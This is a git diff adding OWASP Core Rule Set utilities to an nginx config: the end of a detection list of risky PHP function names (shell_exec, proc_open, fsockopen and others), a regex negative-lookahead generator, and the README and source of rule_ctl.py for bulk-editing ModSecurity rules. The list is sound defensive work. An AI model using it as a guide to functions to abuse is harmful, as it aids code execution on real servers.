+fsockopen +ftp_connect +ftp_get +ftp_nb_get +ftp_nb_put +ftp_put +function_exists +fwrite +get_cfg_var +get_class_methods +get_class_vars +get_current_user +get_defined_constants +get_defined_functions +get_defined_vars +get_meta_tags +getcwd +getenv +getimagesize +getlastmod +getmygid +getmyinode +getmypid +getmyuid +gzcompress +gzdecode +gzdeflate +gzinflate +gzencode +gzfile +gzopen +gzread +gzuncompress +gzwrite +hash_file +hash_hmac_file +hash_update_file +header_register_callback +hex2bin +highlight_file +html_entity_decode +htmlentities +htmlspecialchars +htmlspecialchars_decode +image2wbmp +imagecreatefromgif +imagecreatefromjpeg +imagecreatefrompng +imagecreatefromwbmp +imagecreatefromxbm +imagecreatefromxpm +imagegd +imagegd2 +ini_get +ini_get_all +ini_set +iptcembed +is_dir +is_executable +is_file +is_readable +is_writable +is_writeable +iterator_apply +json_decode +json_encode +mb_ereg +mb_ereg_match +mb_ereg_replace +mb_ereg_replace_callback +mb_eregi +mb_eregi_replace +mb_parse_str +md5_file +method_exists +mkdir +move_uploaded_file +mysql_query +ob_clean +ob_end_clean +ob_end_flush +ob_flush +ob_get_clean +ob_get_contents +ob_get_flush +ob_start +odbc_connect +odbc_exec +odbc_execute +odbc_result +odbc_result_all +parse_ini_file +parse_str +pfsockopen +pg_connect +pg_execute +pg_prepare +pg_query +php_strip_whitespace +php_uname +phpinfo +phpversion +posix_getegid +posix_geteuid +posix_getgid +posix_getlogin +posix_getpwnam +posix_getpwuid +posix_kill +posix_mkfifo +posix_mknod +posix_ttyname +preg_match +preg_match_all +preg_replace +preg_replace_callback +preg_replace_callback_array +preg_split +print_r +proc_close +proc_get_status +proc_nice +proc_open +proc_terminate +putenv +rawurldecode +rawurlencode +read_exif_data +readdir +readgzfile +register_shutdown_function +register_tick_function +rename_function +runkit_constant_add +runkit_constant_redefine +runkit_function_add +runkit_function_copy +runkit_function_redefine +runkit_function_rename +runkit_method_add +runkit_method_copy +runkit_method_redefine +runkit_method_rename +session_set_save_handler +session_start +set_error_handler +set_exception_handler +set_include_path +set_magic_quotes_runtime +setdefaultstub +sha1_file +shell_exec +show_source +simplexml_load_file +simplexml_load_string +socket_connect +socket_create +spl_autoload_register +sqlite_array_query +sqlite_create_aggregate +sqlite_create_function +sqlite_exec +sqlite_open +sqlite_popen +sqlite_query +sqlite_single_query +sqlite_unbuffered_query +stream_context_create +stream_socket_client +stripcslashes +stripslashes +strrev +uasort +uksort +unserialize +urldecode +urlencode +usort +var_dump +zlib_decode diff --git a/nginx/config/owasp-crs/util/regexp-tricks/negative-lookahead.py b/nginx/config/owasp-crs/util/regexp-tricks/negative-lookahead.py new file mode 100644 index 00000000..0145ef39 --- /dev/null +++ b/nginx/config/owasp-crs/util/regexp-tricks/negative-lookahead.py @@ -0,0 +1,121 @@ +import argparse + +# WARNING: This script is EXPERIMENTAL. Use with caution. +# +# Known issues: +# * At the moment, it will probably not work with more than two strings. +# +# Known limitations: +# * Any substrings of a target string will also NOT be matched. This is probably due to a limitation in this technique, +# make sure that subtrings of the negative lookahead are not harmful in any way. + +parser = argparse.ArgumentParser(description="This script takes a list of strings and converts them into \ + a regex that acts like a negative lookahead") +parser.add_argument("strings", type=str, nargs='+', + help="the strings to convert into a negative lookahead") +parser.add_argument("--prefix", type=str, default="", + help="sets a prefix for the resulting regex") +parser.add_argument("--suffix", type=str, default="", + help="sets a suffix for the resulting regex") + +args = parser.parse_args() + +# Return the longest prefix of all list elements. Shamelessly copied from: +# https://stackoverflow.com/questions/6718196/determine-the-common-prefix-of-multiple-strings +def commonprefix(m): + "Given a list of pathnames, returns the longest common leading component" + if not m: return '' + s1 = min(m) + s2 = max(m) + for i, c in enumerate(s1): + if c != s2[i]: + return s1[:i] + return s1 + +# flatten returns a string with concatenated dictionary keys +def flatten(dict): + s = "" + + for key in dict.keys(): + s += key + + return s + +# set returns a character set containing the unique characters across all strings for the given index +def set(strings, index, flags): + dict = {} + + for s in strings: + # Continue so we don't panic + if index > len(s) -1: + continue + + dict[s[index]] = '' + + return "[" + flags + flatten(dict) + "]" + +# prepare converts a string for negative lookaheads emulation +def prepare(s, offset): + r = "" + + if len(s) == 0: + return r + + for i in range(offset, len(s)): + for j in range(0, i + 1): + if j == i: + r += "[^" + s[j] + "]" + else: + r += s[j] + + if i != len(s) - 1: + r += "|" + + return r + +# run runs the +def run(): + strings = args.strings + + r = "" + r += set(strings, 0, "^") + + c = "" + d = {} + + # Only find common string if we have more than one + if len(strings) > 1: + c = commonprefix(strings) + + # Collect all characters after the common substring from every string + for s in strings: + if len(s) > len(c) and s.startswith(c): + d[s[len(c)]] = '' + + # Add the common string to the regex to prevent accidental matching + if len(c) > 0: + if len(c) > 1: + r += "|" + "(?:" + prepare(c, 1) + ")" + + r += "|" + "(?:" + c + "[^" + flatten(d) + "]" + ")" + + for s in strings: + g = "" + + # When the common string is > 0, offset with len(c) + 1 because we handled this earlier + if len(c) > 0: + g = prepare(s, len(c) + 1) + else: + g = prepare(s, 1) + + # Add OR boolean if necessary + if len(g) > 0: + r += "|" + + r += g + + print(args.prefix + "(?:" + r + ")" + args.suffix) + +# Only run if script is called directly +if __name__ == "__main__": + run() diff --git a/nginx/config/owasp-crs/util/rule_ctl/README.md b/nginx/config/owasp-crs/util/rule_ctl/README.md new file mode 100644 index 00000000..374b37e1 --- /dev/null +++ b/nginx/config/owasp-crs/util/rule_ctl/README.md @@ -0,0 +1,135 @@ +draft + +# OWASP CRS Rule Control Script +This script aims to help when a bulk change on configuration files is needed. rule_ctl.py can, for example, change the value of an action on all rules, or can add/remove/rename a tag on each rule in a file, or can add/remove a transformation function only in rules that match range 942100-942190, etc... + +## Example Usage + +There're only two mandatory parameters: `--config` and `--filter-rule-id`. + +**--config** set the target config file
+**--filter-rule-id** a regex that matches only rule ids to change + +For example, if you want to add a new tag on each rule in file `REQUEST-933-APPLICATION-ATTACK-PHP.conf` you can do: + +```sh +python3 util/rule_ctl/rule_ctl.py \ + --config rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf \ + --filter-rule-id ^933.+ \ + --append-tag foo + --dryrun +``` + +`--dryrun` sends to stdout the result of changes and prevent writing changes on file. It's a good idea to always check all commands with dryrun before overwrite the target configuration file. + +You can even alphabetically sort tag list while adding new tags: +```sh +python3 util/rule_ctl/rule_ctl.py \ + --config rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf \ + --filter-rule-id ^933.+ \ + --append-tag foo + --sort-tag + --dryrun +``` + +## Variables +- `--append-variable`: Append a variable on the variable list of selected rules +- `--remove-variable`: Remove exact matching variable from selected rules +- `--replace-variable`: Replace variable on selected rules + +### Examples +Replace the variable name `ARGS` with `ARGS_GET` +```sh +python3 rule_ctl.py --config ../../rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf \ + --filter-rule-id ^.\* \ + --replace-variable ARGS,ARGS_GET \ + --dryrun +``` + +Replace the variable `ARGS` with `!ARGS_GET:'lisa'` +```sh +python3 rule_ctl.py --config ../../rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf \ + --filter-rule-id ^.\* \ + --replace-variable ARGS,\!ARGS_GET:\'lisa\' \ + --dryrun +``` + +## Tags +- `--append-tag`: Append a new tag to the tag list on selected rules +- `--remove-tag`: Remove tag from tag list on selected rules +- `--rename-tag`: Rename tag on selected rules +- `--sort-tags`: Alphabetically sort tag list on selected rules + +### Examples +Append a new tag `foo` and sort tag list +```sh +python3 rule_ctl.py --config ../../rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf \ + --filter-rule-id ^.\* \ + --append-tag foo \ + --sort-tags \ + --dryrun +``` + +Remove a tag `foo` +```sh +python3 rule_ctl.py --config ../../rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf \ + --filter-rule-id ^.\* \ + --remove-tag foo \ + --dryrun +``` + +Rename a tag `foo` +```sh +python3 rule_ctl.py --config ../../rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf \ + --filter-rule-id ^.\* \ + --rename-tag foo,bar \ + --dryrun +``` + +## Transformation Functions +- `--append-tfunc`: Append a new transformation function on selected rules +- `--remove-tfunc`: Remove a transformation function on selected rules + +### Examples +Append `t:lowercase` to all selected rules (you don't need the `t:` prefix) +```sh +python3 rule_ctl.py --config ../../rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf \ + --filter-rule-id ^.\* \ + --append-tfunc lowercase \ + --dryrun +``` + +## Actions +- `--replace-action`: Replace action on selected rules +- `--remove-action`: remove action from selected rules + +### Examples +Replace action `severity:CRITICAL` with `severity:INFO` and set a new message on rule id 125 +```sh +python3 rule_ctl.py --config ../../rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf \ + --filter-rule-id ^125 \ + --replace-action severity:CRITICAL,severity:INFO \ + --uncond-replace-action 'msg:this is a new message for rule 125' \ + --dryrun +``` + +## CTL +- `--append-ctl`: Append a new ctl action on selected rules + +### Examples +Remove rule id 1337 on rule 125 by adding ctl:ruleRemoveById=1337. Do it on main rule (skipping chained rules if present) +```sh +python3 rule_ctl.py --config ../../rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf \ + --filter-rule-id ^125 \ + --append-ctl ruleRemoveById=1337 \ + --skip-chain \ + --dryrun +``` + +## Others +- `--target-file`: Set the target file where changes will be saved (default: use file set by `--config`) +- `--skip-chain`: Skip chained rules +- `--dryrun`: Do not write any changes, just output the results +- `--debug`: Show debug messages +- `--silent`: Used with `--dryrun` and `--debug` doesn't write and shows only debug messages +- `--json`: Used with `--dryrun` return the msc_pyparser JSON output instead of ModSecurity file diff --git a/nginx/config/owasp-crs/util/rule_ctl/pyproject.toml b/nginx/config/owasp-crs/util/rule_ctl/pyproject.toml new file mode 100644 index 00000000..77c7e6ef --- /dev/null +++ b/nginx/config/owasp-crs/util/rule_ctl/pyproject.toml @@ -0,0 +1,5 @@ +[tool.pytest.ini_options] +minversion = "6.0" +testpaths = [ + "tests", +] diff --git a/nginx/config/owasp-crs/util/rule_ctl/requirements.txt b/nginx/config/owasp-crs/util/rule_ctl/requirements.txt new file mode 100644 index 00000000..2e1b1f04 --- /dev/null +++ b/nginx/config/owasp-crs/util/rule_ctl/requirements.txt @@ -0,0 +1,3 @@ +argparse +msc_pyparser +pytest diff --git a/nginx/config/owasp-crs/util/rule_ctl/rule_ctl.py b/nginx/config/owasp-crs/util/rule_ctl/rule_ctl.py new file mode 100755 index 00000000..afa4f155 --- /dev/null +++ b/nginx/config/owasp-crs/util/rule_ctl/rule_ctl.py @@ -0,0 +1,801 @@ +#! /usr/bin/env python + +import sys, re, json, uuid + +try: + import argparse, msc_pyparser +except: + print(f"Error: missing modules.\nYou can install all dependences with: pip3 install -r requirements.txt") + sys.exit(1) + +ACTION_ORDER = { + key: index for index, key in enumerate( + [ + "id", + "phase", + "allow", + "block", + "deny", + "drop", + "pass", + "proxy", + "redirect", + "status", + "capture", + "t", + "log", + "nolog", + "auditlog", + "noauditlog", + "msg", + "logdata", + "tag", + "sanitiseArg", + "sanitiseRequestHeader", + "sanitiseMatched", + "sanitiseMatchedBytes", + "ctl", + "ver", + "severity", + "multiMatch", + "initcol", + "setenv", + "setvar", + "expirevar", + "chain", + "skip", + "skipAfter" + ] + ) +} + +class Context(object): + def __init__(self): + self.args = () + self.line_number_change = 0 + self.next_index_to_parse = 0 + self.parser = None + self._rules = [] + self._rules_map = {} + + def parse_rules(self, data): + mparser = msc_pyparser.MSCParser() + mparser.parser.parse(data, debug = False) + + for line in mparser.configlines: + type = line["type"] + if type == "SecAction": + rule = SecAction(line, self) + elif type == "Comment": + rule = Comment(line, self) + elif type == "SecRule": + rule = SecRule(line, self) + else: + rule = Directive(line, self) + + self._rules.append(rule) + if isinstance(rule, SecAction): + if rule.is_chained(): + self._rules_map[rule.id]['chained'].append(rule) + else: + self._rules_map[rule.id] = { + 'rule': rule, + 'chained': [] + } + yield rule + + def get_chain_starter_rule(self, rule): + try: + self._rules_map[rule.id]['rule'] + except KeyError: + # Chained rules don't have ID during initialization. + # In this case, however, the last parsed rule now has one + return self._rules_map[self._rules[-1].id]['rule'] + + def dprint(self, rule_id, action, message, indent): + if not indent: + indent=0 + + prefix = "[*]" + if indent > 0: + prefix = "`" + + if not rule_id: + rule_id = "chained" + + print(f'{" "*int(indent)}{prefix} \033[92m{rule_id}/{action}\033[0m: {message}') + + def generate_output(self): + mwriter = msc_pyparser.MSCWriter(self.generate_lines()) + mwriter.generate() + return mwriter.output + + def generate_lines(self): + generated_lines = [] + line_number_change = 0 + for rule in self._rules: + lines, line_number_change = rule.generate_lines(line_number_change) + generated_lines.append(lines) + return generated_lines + + def parse_arguments(self, args=None): + args_parser = self._create_args_parser() + self.args = args_parser.parse_args(args) + + def _create_args_parser(self): + parser = argparse.ArgumentParser(description="OWASP CRS Configuration Control") + parser.add_argument("--config", dest="config", help="OWASP ModSecurity CRS config file path", required=True) + parser.add_argument("--filter-rule-id", dest="filter_rule_id", help="Filter on ruleid (regex)", required=False) + parser.add_argument("--append-variable", dest="append_variable", help="Append var on SecRule (string)", action='append', required=False) + parser.add_argument("--remove-variable", dest="remove_variable", help="Remove var from SecRule (string)", action='append', required=False) + parser.add_argument("--replace-variable", dest="replace_variable", help="Replace var in SecRule (old,new) (string)", action='append', required=False) + parser.add_argument("--append-tag", dest="append_tag", help="Append tag on SecRule (string)", required=False) + parser.add_argument("--remove-tag", dest="remove_tag", help="Remove tag from SecRule (string)", required=False) + parser.add_argument("--rename-tag", dest="rename_tag", help="Rename tag on SecRule (old,new) (string)", required=False) + parser.add_argument("--sort-tags", dest="sort_tags", help="Sort tag list in SecRule", action="store_true", required=False) + parser.add_argument("--append-tfunc", dest="append_tfunc", help="Append transformation func on SecRule (example: urlDecodeUni) (string)", action='append', required=False) + parser.add_argument("--remove-tfunc", dest="remove_tfunc", help="Remove transformation func from SecRule (example: urlDecodeUni) (string)", action='append', required=False) + parser.add_argument("--append-action", dest="append_action", help="Append action on Secrule (example: 'severity:CRITICAL) (string)", required=False) + parser.add_argument("--replace-action", dest="replace_action", help="Replace action (example: 'severity:CRITICAL,severity:INFO') (string)", required=False) + parser.add_argument("--remove-action", dest="remove_action", help="Remove action from SecRule (string)", required=False) + parser.add_argument("--append-ctl", dest="append_ctl", help="Append ctl action on SecRule (example: 'ruleRemoveTargetById=1234;ARGS:passwd') (string)", required=False) + parser.add_argument("--target-file", dest="target_file", help="Save changes in another file (string)", required=False) + parser.add_argument("--skip-chain", dest="skip_chain", help="Skip chained rules", action="store_true", required=False) + parser.add_argument("--dryrun", dest="dryrun", help="Show changes without write", action="store_true", required=False) + parser.add_argument("--silent", dest="silent", help="Do not output content file on dryrun", action="store_true", required=False) + parser.add_argument("--debug", dest="debug", help="Show debug messages", action="store_true", required=False) + parser.add_argument("--json", dest="output_json", help="Get all output in JSON format", action="store_true", required=False) + return parser + +class RuleFileItem(object): + def __init__(self, data, context): + self._data = data + self._line_numbers = {"rule_line": data["lineno"]} + + def modify(self, context): + pass + + def generate_lines(self, line_number_change): + new_line_number_change = self._update_line_numbers(line_number_change) + return (self._data, new_line_number_change) + + def _update_line_numbers(self, line_number_change): + self._data["lineno"] = self._line_numbers["rule_line"] + line_number_change + + return line_number_change + +class SecAction(RuleFileItem): + TAG_RENAME_REGEX = re.compile('^([^,]+),(.+)$') + ACTION_REPLACE_REGEX = re.compile('^([^,]+),(.+)$') + ACTION_REPLACE_VALUES_REGEX = re.compile('^([^:]+)(?::(.+))?$') + CTL_APPEND_REGEX = re.compile('^([^=]+)=([^;]+)(;[^:]+:.+|)$') + CTL_APPEND_PARAMS_REGEX = re.compile('^;([^:]+):(.+)$') + id = None + _id_matcher = None + + def __init__(self, data, context): + super().__init__(data, context) + + for action in self.get_actions(): + action["id"] = uuid.uuid4() + if action["act_name"] == "id": + self.id = int(action["act_arg"]) + break + + if "oplineno" in self._data: + self._line_numbers["opline"] = self._data["oplineno"] + for action in self.get_actions(): + self._line_numbers[("action", uuid)] = action["lineno"] + + def _parse_var(self, variable): + negated = False + counter = False + newvar = variable + newvarpart = "" + quote_type = "no_quote" + m = re.match('^([!&]?)([^:]+)(?::(.+))?$', variable) + if m: + counter = m.group(1) == '&' + negated = m.group(1) == '!' + newvar = m.group(2) + varpart = m.group(3) + if varpart is not None: + if varpart[0] == '"' and varpart[-1] == '"': + quote_type = 'quoted' + varpart = varpart[1:-1] + elif varpart[0] == "'" and varpart[-1] == "'": + quote_type = 'quotes' + varpart = varpart[1:-1] + newvarpart = varpart + return { + "variable": newvar, + "variable_part": newvarpart, + "quote_type": quote_type, + "negated": negated, + "counter": counter + } + + def _is_equal_variable(self, variable1, variable2): + compare_fields = ("variable", "variable_part", "negated", "counter") + return all(variable1[field] == variable2[field] for field in compare_fields) + + def _has_variable(self, variable): + for var in self.get_variables(): + if self._is_equal_variable(variable, var): + return True + return False + + + + def _update_line_numbers(self, line_number_change): + #TODO: doesn't yet work when order changes, e.g. variables and tags may not have been grouped together + super()._update_line_numbers(line_number_change) + + first_line_number = last_line_number = self._data["lineno"] + + if "oplineno" in self._data: + last_line_number = self._line_numbers["opline"] + line_number_change + self._data["oplineno"] = last_line_number + + + for action in self.get_actions(): + try: + last_line_number = self._line_numbers[("action", action["id"])] + line_number_change + action["lineno"] = last_line_number + except KeyError: + # keep everything on one line if it already was + if any(lineno > self._line_numbers['rule_line'] for lineno in self._line_numbers.values()): + last_line_number += 1 + action["lineno"] = last_line_number + + original_first_line_number = min(self._line_numbers.values()) + original_last_line_number = max(self._line_numbers.values()) + original_length = original_last_line_number - original_first_line_number + new_length = last_line_number - first_line_number + start_change = first_line_number - original_first_line_number + length_change = new_length - original_length + total_change = length_change + start_change + return total_change + + def modify(self, context): + if context.args.filter_rule_id and not self.matches_id(context.args.filter_rule_id): + return + + self.append_tag(context) + self.remove_tag(context) + self.rename_tag(context) + self.append_tfunc(context) + self.remove_tfunc(context) + self.append_action(context) + self.replace_action(context) + self.remove_action(context) + self.append_variables(context) + self.remove_variables(context) + self.replace_variables(context) + self.append_ctl(context) + self.sort_tags(context) + + def get_actions(self): + try: + return self._data["actions"] + except KeyError: + return [] + + def set_actions(self, actions): + self._data["actions"] = actions + + def get_variables(self): + try: + return self._data["variables"] + except KeyError: + return [] + + def set_variables(self, variables): + self._data["variables"] = variables + + def get_tags(self): + return [action for action in self.get_actions() if action["act_name"] == "tag"] + + def get_ctls(self): + return [action for action in self.get_actions() if action["act_name"] == "ctl"] + + def matches_id(self, id_pattern): + if self._id_matcher is None: + self._id_matcher = re.compile(id_pattern) + return self._id_matcher.match(str(self.id)) != None + + def append_tag(self, context): + if context.args.append_tag is None: + return + + #TODO: support appending multiple tags + tags = self.get_tags() + if context.args.append_tag in [tag["act_arg"] for tag in tags]: + return + + actions = self.get_actions() + new_act_list = [] + last_tag_line = 0 + tag_order = ACTION_ORDER["tag"] + new_tag = { + 'id': uuid.uuid4(), + 'act_name': 'tag', + 'lineno': 0, + 'act_quote': 'quotes', + 'act_arg': context.args.append_tag, + 'act_arg_val': '', + 'act_arg_val_param': '', + 'act_arg_val_param_val': '' + } + + done = False + last_action_index = len(actions) - 1 + for index, action in enumerate(actions): + action_name = action["act_name"] + action_order = ACTION_ORDER[action_name] + if action_order <= tag_order: + last_tag_line = action["lineno"] + new_act_list.append(action) + if not done and (action_order > tag_order or index == last_action_index): + done = True + new_act_list.append(new_tag) + if context.args.debug: + context.dprint(self.id, "append-tag", f"append tag {context.args.append_tag} on line {last_tag_line}", 0) + if action_order > tag_order: + new_act_list.append(action) + self.set_actions(new_act_list) + + def remove_tag(self, context): + if context.args.remove_tag is None: + return + + #TODO: support removing multiple tags + actions = self.get_actions() + new_act_list = [] + for action in actions: + if action["act_name"] == "tag": + if action["act_arg"] != context.args.remove_tag: + new_act_list.append(action) + else: + if context.args.debug: + context.dprint(self.id, "remove-tag", f"remove tag {context.args.remove_tag} on line {action['lineno']}", 0) + else: + new_act_list.append(action) + + self.set_actions(new_act_list) + + def rename_tag(self, context): + if context.args.rename_tag is None: + return + + match = self.TAG_RENAME_REGEX.match(context.args.rename_tag) + if match is None: + return + + old_tag = match.group(1) + new_tag = match.group(2) + new_act_list = [] + for act in self.get_actions(): + if act["act_name"] == "id": + current_rule_id = act["act_arg"] + if act["act_name"] == "tag": + if act["act_arg"] == old_tag: + act["act_arg"] = new_tag + if context.args.debug: + context.dprint(current_rule_id, "rename-tag", f"rename tag {old_tag} to {new_tag} on line {act['lineno']}", 0) + new_act_list.append(act) + else: + new_act_list.append(act) + self.set_actions(new_act_list) + + def append_action(self, context): + if context.args.append_action is None: + return + + match = self.ACTION_REPLACE_VALUES_REGEX.match(context.args.append_action) + if match is None: + return + + new_action_name = match.group(1) + new_action_value = match.group(2) or "" + + #TODO: support appending multiple actions + actions = self.get_actions() + if ( + new_action_name in [action["act_name"] for action in actions] and + new_action_value in [action["act_arg"] for action in actions] + ): + return + + new_act_list = [] + last_action_line = 0 + new_action_order = ACTION_ORDER[new_action_name] + has_quotes = len(new_action_value) > 0 and new_action_value[0] in '"\'' and new_action_value[-1] in '"\'' + if has_quotes: + new_action_value = new_action_value[1:-1] + new_action = { + 'id': uuid.uuid4(), + 'act_name': new_action_name, + 'lineno': 0, + 'act_quote': 'quotes' if has_quotes else 'no_quote', + 'act_arg': new_action_value, + 'act_arg_val': '', + 'act_arg_val_param': '', + 'act_arg_val_param_val': '' + } + + done = False + last_action_index = len(actions) - 1 + for index, action in enumerate(actions): + action_name = action["act_name"] + action_order = ACTION_ORDER[action_name] + if action_order <= new_action_order: + last_action_line = action["lineno"] + new_act_list.append(action) + if not done and (action_order > new_action_order or index == last_action_index): + done = True + new_act_list.append(new_action) + if context.args.debug: + context.dprint(self.id, "append-action", f"append action {context.args.append_action} on line {last_action_line}", 0) + if action_order > new_action_order: + new_act_list.append(action) + + if len(new_act_list) == 0: + new_act_list.append(new_action) + + self.set_actions(new_act_list) + + + + def replace_action(self, context): + if context.args.replace_action is None: + return + + match = self.ACTION_REPLACE_REGEX.match(context.args.replace_action) + if match is None: + return + + from_string = match.group(1) + to_string = match.group(2) + from_match = self.ACTION_REPLACE_VALUES_REGEX.match(from_string) + to_match = self.ACTION_REPLACE_VALUES_REGEX.match(to_string) + if from_match is None or to_match is None: + return + + from_actname = from_match.group(1) + from_actvalue = from_match.group(2) or "" + to_actname = to_match.group(1) + to_actvalue = to_match.group(2) or "" + has_quotes = len(to_actvalue) > 0 and to_actvalue[0] in '"\'' and to_actvalue[-1] in '"\'' + if has_quotes: + to_actvalue = to_actvalue[1:-1] + + for act in self.get_actions(): + if act["act_name"] == from_actname: + # match all actions of the specified name if `from_actvalue` is empty + if len(from_actvalue) == 0 or act["act_arg"] == from_actvalue: + act["act_name"] = to_actname + act["act_arg"] = to_actvalue + act["act_quote"] = "quotes" if has_quotes else "no_quote" + + def remove_action(self, context): + if context.args.remove_action is None: + return + + actions = self.get_actions() + new_act_list = [] + for action in actions: + if action["act_name"] != context.args.remove_action: + new_act_list.append(action) + + self.set_actions(new_act_list) + + def append_tfunc(self, context): + if context.args.append_tfunc is None: + return + + transform_order = ACTION_ORDER["t"] + actions = self.get_actions() + last_action_index = len(actions) - 1 + transformation_names = [action["act_arg"] for action in actions if action["act_name"] == "t"] + + for tfunc in context.args.append_tfunc: + if tfunc in transformation_names: + continue + + new_act_list = [] + done = False + last_lineno = 0 + for index, act in enumerate(actions): + action_name = act["act_name"] + action_order = ACTION_ORDER[action_name] + if action_order <= transform_order: + last_lineno = act["lineno"] + new_act_list.append(act) + if not done and (action_order > transform_order or index == last_action_index): + done = True + new_act_list.append({ + 'id': uuid.uuid4(), + 'act_name': 't', + 'lineno': last_lineno, + 'act_quote': 'no_quote', + 'act_arg': tfunc, + 'act_arg_val': '', + 'act_arg_val_param': '', + 'act_arg_val_param_val': '' + }) + if context.args.debug: + context.dprint(self.id, "append-tfunc", f"append transformation {context.args.append_tfunc} on line {last_lineno}", 0) + if action_order > transform_order: + new_act_list.append(act) + actions = new_act_list + + self.set_actions(actions) + + + def remove_tfunc(self, context): + if context.args.remove_tfunc is None: + return + + actions = self.get_actions() + for tfunc in context.args.remove_tfunc: + new_act_list = [] + for act in actions: + if act["act_name"] == "t": + if act["act_arg"] != tfunc: + new_act_list.append(act) + else: + new_act_list.append(act) + actions = new_act_list + + self.set_actions(actions) + + + def append_variables(self, context): + if context.args.append_variable is None: + return + + variables = self.get_variables() + for nv in context.args.append_variable: + newvar = self._parse_var(nv) + if self._has_variable(newvar): + continue + + new_var_list = [] + for v in variables: + new_var_list.append(v) + new_var_list.append({ + "variable": newvar["variable"], + "variable_part": newvar["variable_part"], + "quote_type": "no_quote", + "negated": newvar["negated"], + "counter": newvar["counter"] + }) + if context.args.debug: + context.dprint(self.id, "append-variable", f"Append variable {newvar}:{newvar['variable_part']}", 0) + variables = new_var_list + + self.set_variables(variables) + + + def remove_variables(self, context): + if context.args.remove_variable is None: + return + + variables = self.get_variables() + for nv in context.args.remove_variable: + var = self._parse_var(nv) + if not self._has_variable(var): + continue + + new_var_list = [] + for v in variables: + if not self._is_equal_variable(var, v): + new_var_list.append(v) + else: + if context.args.debug: + varpart = var["variable_part"] + negated = var["negated"] + counter = var["counter"] + context.dprint(self.id, "remove-variable", f"Removed variable {var}:{varpart} negated:{negated} counter:{counter}", 0) + variables = new_var_list + self.set_variables(variables) + + + def replace_variables(self, context): + if context.args.replace_variable is None: + return + + variables = self.get_variables() + for nv_tosplit in context.args.replace_variable: + oldvar, newvar = nv_tosplit.split(",") + ov = self._parse_var(oldvar) + nv = self._parse_var(newvar) + + new_variable = nv["variable"] + newvarpart = nv["variable_part"] + newnegated = nv["negated"] + newcounter = nv["counter"] + newquotetype = nv["quote_type"] + old_variable = ov["variable"] + oldvarpart = ov["variable_part"] + oldnegated = ov["negated"] + oldcounter = ov["counter"] + oldquotetype = ov["quote_type"] + new_var_list = [] + for v in variables: + if (v["variable"] == old_variable and v["variable_part"] == oldvarpart + and v["negated"] == oldnegated and v["counter"] == oldcounter and v["quote_type"] == oldquotetype): + new_var_list.append({ + "variable": new_variable, + "variable_part": newvarpart, + "quote_type": newquotetype, + "negated": newnegated, + "counter": newcounter + }) + if context.args.debug: + context.dprint(self.id, "replace-variable", f"Replaced variable {oldvar}:{oldvarpart} negated:{oldnegated} counter:{oldcounter} quote_type:{oldquotetype} with {newvar}:{newvarpart} negated:{newnegated} counter:{newcounter} quote_type:{newquotetype}", 0) + else: + new_var_list.append(v) + variables = new_var_list + + self.set_variables(variables) + + def append_ctl(self, context): + # TODO: support appending multiple ctl + if context.args.append_ctl is None: + return + + match = self.CTL_APPEND_REGEX.match(context.args.append_ctl) + if match is None: + return + + arg = match.group(1) + if arg.startswith('ctl:'): + arg = arg[4:] + val = match.group(2) + + params = self.CTL_APPEND_PARAMS_REGEX.match(match.group(3)) + param = params.group(1) if params is not None else "" + paramval = params.group(2) if params is not None else "" + + ctls = self.get_ctls() + if ( + arg in [ctl["act_arg"] for ctl in ctls] and + val in [ctl["act_arg_val"] for ctl in ctls] and + param in [ctl["act_arg_val_param"] for ctl in ctls] and + paramval in [ctl["act_arg_val_param_val"] for ctl in ctls] + ): + return + + actions = self.get_actions() + new_act_list = [] + last_ctl_line = 0 + ctl_order = ACTION_ORDER["ctl"] + new_ctl = { + "id": uuid.uuid4(), + "act_name": "ctl", + "lineno": last_ctl_line, + "act_quote": "no_quote", + "act_arg": arg, + "act_arg_val": val, + "act_arg_val_param": param, + "act_arg_val_param_val": paramval + } + + done = False + last_action_index = len(actions) - 1 + for index, action in enumerate(actions): + action_name = action["act_name"] + action_order = ACTION_ORDER[action_name] + if action_order <= ctl_order: + last_ctl_line = action["lineno"] + new_act_list.append(action) + if not done and (action_order > ctl_order or index == last_action_index): + done = True + new_act_list.append(new_ctl) + if context.args.debug: + context.dprint(self.id, "append-ctl", f"append ctl {context.args.append_ctl} on line {last_ctl_line}", 0) + if action_order > ctl_order: + new_act_list.append(action) + + if len(new_act_list) == 0: + new_act_list.append(new_ctl) + + self.set_actions(new_act_list) + + + def sort_tags(self, context): + #TODO: tags don't need to be grouped together; need to look through all actions + if not context.args.sort_tags: + return + + new_act_list = [] + post_tag_actions = [] + tags = [] + last_lineno = None + found_tag = False + for act in self.get_actions(): + if act["act_name"] == "tag": + tags.append(act) + found_tag = True + if last_lineno is None: + first_lineno = act["lineno"] + elif not found_tag: + new_act_list.append(act) + elif found_tag: + post_tag_actions.append(act) + + def get_sort_key(tag): + return tag["act_arg"].lower() + + sorted_tags = sorted(tags, key=get_sort_key) + for tag in sorted_tags: + new_act_list.append(tag) + tag["lineno"] = first_lineno + first_lineno += 1 + + for act in post_tag_actions: + new_act_list.append(act) + + self.set_actions(new_act_list) + +class Comment(RuleFileItem): + pass + +class Directive(RuleFileItem): + pass + +class SecRule(SecAction): + _is_chained = False + + def __init__(self, data, context): + super().__init__(data, context) + + # for chained rules (they have no ID) + if self.id is None: + self.id = context.get_chain_starter_rule(self).id + self._is_chained = True + + def has_chained_rules(self): + return self._data["chained"] + + def is_chained(self): + return self._is_chained + + def modify(self, context): + if context.args.skip_chain and self.is_chained(): + return + + super().modify(context) + + +def write_output(context): + if context.args.dryrun and context.args.output_json: + print(json.dumps(context.generate_lines(), indent=4)) + return + + if context.args.dryrun: + if not context.args.silent: + print("\n".join(context.generate_output())) + return + + path = context.args.target_file if context.args.target_file else context.args.config + with open(path, 'w') as handle: + handle.write("\n".join(context.generate_output())) + + +def run(): + context = Context() + context.parse_arguments() + + with open(context.args.config) as file: + data = file.read() + + for rule in context.parse_rules(data): + rule.modify(context) + + write_output(context) + +if __name__ == '__main__': + run() diff --git a/nginx/config/owasp-crs/util/rule_ctl/tests/__init__.py 